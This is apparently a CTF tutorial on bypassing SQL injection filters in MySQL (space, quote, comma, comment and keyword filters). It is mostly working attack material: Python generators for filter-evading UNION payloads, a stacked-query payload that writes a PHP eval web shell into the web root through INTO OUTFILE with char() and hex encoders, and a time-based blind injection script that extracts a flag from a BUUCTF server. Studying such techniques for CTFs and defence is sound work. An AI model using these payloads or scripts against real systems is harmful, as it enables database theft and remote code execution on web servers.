Ctfer: SQL injection from 0.1 to 0.2
Summary of SQL injection filter bypasses
1. Bypassing space filters:
(1) Replace every space with /**/ (the most common choice)
(2) Write two spaces in place of one (double-write bypass; only helps against a filter that strips a matched space once rather than every occurrence)
(3) Wrap each clause in parentheses so that no space is needed at all, e.g.:
ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema="geek")),1,1))=100
2. Bypassing an "or" filter (a substring filter on "or" also kills "order" and "information"):
(1) When order by cannot be used, use group by instead.
(2) When information_schema cannot be used, fall back to column-name-free blind injection (covered later).
3. Bypassing quote filters:
Quotes are normally only needed for string literals in the WHERE clause; there the literal can be written as a hex number instead (column_name lives in information_schema.columns, not .tables). For example
select column_name from information_schema.columns where table_name="users"#
becomes:
select column_name from information_schema.columns where table_name=0x7573657273 (0x7573657273 is the hex encoding of the string users)
4. Bypassing comma filters:
(1):
union select 1,2
#is equivalent to
union select * from (select 1)a join (select 2)b
(tested and working; for more than two columns keep appending join terms, one derived table per column)
(2): other variants, see the PPT
5. Bypassing comment-marker filters
When neither # nor --+ can be used at the end to close the dangling quote, the approaches collected here are:
(1) AND the dangling quote into a tautology: &&'1'='1 (did not seem to work in testing)
(2) Let the last column of the query absorb it: select 1,2,'3 (works)
6. Bypassing filters on union, select, where, etc.
(1) Using comment markers:
Commonly listed comment markers: //, -- , /**/, #, --+, -- -, ; , %00 , --a
U/**/ NION /**/ SE/**/ LECT /**/user,pwd from user
Caveat: MySQL's lexer treats a /**/ comment as whitespace, so a keyword split by a comment (U/**/NION) does not parse on MySQL; comments are only reliable as space replacements between tokens. Note also that // is not a comment marker in MySQL at all.
(2) Mixed case (defeats case-sensitive blacklists):
id=-1'UnIoN/**/SeLeCT
(3) Double-writing (for filters that strip each keyword once without re-scanning the result):
id=-1'UNIunionON SeLselectECT 1,2,3--
(4) Inline (version) comments:
id=-1'/*!UnIoN*/ SeLeCT 1,2,concat(/*!table_name*/) FrOM /*!information_schema*/.tables /*!WHERE *//*!TaBlE_ScHeMa*/ like database()#
#When /*! is not immediately followed by a version number, MySQL parses and executes the text inside the comment as ordinary SQL (the default); with a version number, only servers at or above that version execute it.
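As an added illustration (not code from the original post), the following Python models the kind of single-pass blacklist filter that sections 1, 4 and 6 above are written against, and generates payloads that survive it: double-written keywords, /**/ in place of spaces, and a comma-free UNION built from one derived table per column (the two-column form in section 4, generalised to any width). It also shows the hardened fixpoint filter against which double-writing fails. The blacklist, the filter functions and all names are constructed for this example.

```python
import re

# Constructed blacklist standing in for the CTF filter: the keywords from
# sections 1, 4 and 6 above. A space is blacklisted too, so spaces must go.
BLACKLIST = ("union", "select", "where", " ")


def single_pass_filter(s, words=BLACKLIST):
    """Strip every blacklisted word once, case-insensitively, without
    re-scanning the result. This is the filter shape double-writing defeats."""
    for w in words:
        s = re.sub(re.escape(w), "", s, flags=re.IGNORECASE)
    return s


def fixpoint_filter(s, words=BLACKLIST):
    """Hardened variant: re-apply the stripping until nothing changes.
    Double-written keywords do not survive this one."""
    prev = None
    while prev != s:
        prev, s = s, single_pass_filter(s, words)
    return s


def double_write(word):
    """Nest a lowercase copy inside the keyword ('union' -> 'UNIunionON') so
    that removing the inner copy once leaves the outer keyword intact."""
    cut = (len(word) + 1) // 2
    outer = word.upper()
    return outer[:cut] + word.lower() + outer[cut:]


def union_without_commas(values):
    """'union select 1,2,3' rewritten as a join of one derived table per
    column, so the text contains no comma (section 4, any number of columns)."""
    tables = [f"(select {v})t{i}" for i, v in enumerate(values)]
    return "union select * from " + " join ".join(tables)


def evade(sql, words=("union", "select", "where")):
    """Double-write each filtered keyword, then replace spaces with /**/."""
    for w in words:
        sql = re.sub(re.escape(w), double_write(w), sql, flags=re.IGNORECASE)
    return sql.replace(" ", "/**/")


def build_payload(n_cols):
    """Comma-free, space-free UNION payload for n_cols columns that reaches
    MySQL as valid SQL after one pass of single_pass_filter."""
    return evade(union_without_commas(range(1, n_cols + 1)))


if __name__ == "__main__":
    p = build_payload(3)
    print("sent:       ", p)
    print("single-pass:", single_pass_filter(p))  # valid UNION SELECT reaches MySQL
    print("fixpoint:   ", fixpoint_filter(p))     # keywords gone, bypass fails
```

The comment-as-space replacement is applied after double-writing so that the filter's space rule never sees a space, while the nested keywords still contain exactly one removable copy each. Before spending requests on a target, run the candidate payload through a local model of the filter like this one and confirm what comes out is SQL MySQL will actually parse.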
7. Using char() to bypass character filters when stacked queries are available
Reference: SUCTF 2018 Multisql
The statement to inject is
select '<?php eval($_POST[_]);?>' into outfile '/var/www/html/favicon/shell.php';
Write a Python script to convert the statement into its decimal char() form, so that the request carries neither quotes nor keywords from the statement:
char(115,101,108,101,99,116,32,39,60,63,112,104,112,32,101,118,97,108,40,
36,95,80,79,83,84,91,95,93,41,59,63,62,39,32,105,110,116,111,32,111,117,116,
102,105,108,101,32,39,47,118,97,114,47,119,119,119,47,104,116,109,108,47,
102,97,118,105,99,111,110,47,115,104,101,108,108,46,112,104,112,39,59)
Injection payload (the encoded statement goes into a user variable and is run with prepare/execute):
?id=2;set @sql=char(115,101,108,101,99,116,32,39,60,63,112,104,112,32,101,118,97,
108,40,36,95,80,79,83,84,91,95,93,41,59,63,62,39,32,105,110,116,111,32,111,117,116,
102,105,108,101,32,39,47,118,97,114,47,119,119,119,47,104,116,109,108,47,102,97,
118,105,99,111,110,47,115,104,101,108,108,46,112,104,112,39,59);prepare query from @sql;execute query;
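The conversion script mentioned above is not reproduced on the page, so here is an added version (not the author's code) that produces both the char() form used in this section and the 0x hex literal used in sections 3 and 8, with decoders for checking a payload before it is sent. SHELL_SQL is the statement from this section; the variable and statement names default to the ones used in the page's payloads, and the function names are this example's own.

```python
# Added example: encoders for the stacked-injection payloads above.
SHELL_SQL = "select '<?php eval($_POST[_]);?>' into outfile '/var/www/html/favicon/shell.php';"


def to_char_expr(sql):
    """MySQL CHAR(...) form: one decimal byte value per character, so the
    payload contains only the function name, digits, commas and parentheses."""
    return "char(" + ",".join(str(b) for b in sql.encode("utf-8")) + ")"


def to_hex_literal(sql):
    """MySQL hex literal (0x...), read by the server as a binary string; the
    same encoding replaces a quoted string in a WHERE clause (section 3)."""
    return "0x" + sql.encode("utf-8").hex()


def from_char_expr(expr):
    """Decode char(...) back to text, to check a payload before sending it."""
    inner = expr[len("char("):-1]
    return bytes(int(n) for n in inner.split(",")).decode("utf-8")


def from_hex_literal(lit):
    """Decode a 0x... literal back to text."""
    return bytes.fromhex(lit[2:]).decode("utf-8")


def stacked_payload(sql, encoding="hex", prefix="", var="@a", stmt="ctftest"):
    """Wrap the encoded statement in SET / PREPARE / EXECUTE. `prefix` is
    whatever closes the original query: "2" for the ?id= parameter in this
    section, "asd'" for the login form in the next one."""
    enc = to_hex_literal(sql) if encoding == "hex" else to_char_expr(sql)
    return f"{prefix};set {var}={enc};prepare {stmt} from {var};execute {stmt};"


if __name__ == "__main__":
    print(to_char_expr(SHELL_SQL))
    # Reproduces the ?id= payload of this section
    print(stacked_payload(SHELL_SQL, "char", prefix="2", var="@sql", stmt="query"))
    # Hex variant as used by the script in the next section
    print(stacked_payload(SHELL_SQL, "hex", prefix="asd'"))
```

Either encoding leaves only set, prepare and execute visible to the filter; char() is the fallback when the letters a-f or the 0x prefix are themselves blocked, at the cost of a much longer payload.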
8. Using hexadecimal to bypass character filters when stacked queries are available
MySQL accepts hexadecimal literals (0x...), so the statement can be converted to hex to get past keyword filtering: the filter only ever sees set, prepare, execute and a hex string.
Reference: SWPU2019 Web4
Reference script for bypassing the filter with MySQL prepared statements and hex (a time-based blind extraction of the flag):
import requests
import json
import time


def main():
    url = '''http://26a14761-8c46-43ab-a339-3d0c980a4439.node4.buuoj.cn:81/index.php?r=Login/Login'''
    # Stacked injection: the hex-encoded query goes into a user variable and is
    # run through PREPARE/EXECUTE, so no keyword or quote from the query itself
    # appears in the request body.
    payloads = "asd';set @a=0x{0};prepare ctftest from @a;execute ctftest;"
    flag = ''
    for i in range(1, 30):
        # Time-based query: sleep(3) fires only when the i-th character equals j
        payload = "select if(ascii(substr((select flag from flag),{0},1))={1},sleep(3),1)"
        for j in range(32, 128):
            # Hex-encode the constructed query and wrap it in the JSON body
            datas = {'username': payloads.format(str_to_hex(payload.format(i, j))),
                     'password': 'test213'}
            data = json.dumps(datas)
            try:
                res = requests.post(url=url, data=data, timeout=2)
                res.raise_for_status()
                time.sleep(0.5)
            except requests.exceptions.Timeout:
                # A read timeout (2 s) means sleep(3) ran: character found
                flag = flag + chr(j)
                print(i)
                print(flag)
                break
            except requests.HTTPError:
                print(i, j, res.status_code)  # buuctf returns 429 when hit too often
        else:
            # No character in 32..127 matched: end of the flag (or rate limited)
            break
    print('flag:', flag)


def str_to_hex(s):
    # Two hex digits per byte; MySQL reads 0x... as a binary string literal
    return s.encode().hex()


if __name__ == '__main__':
    main()
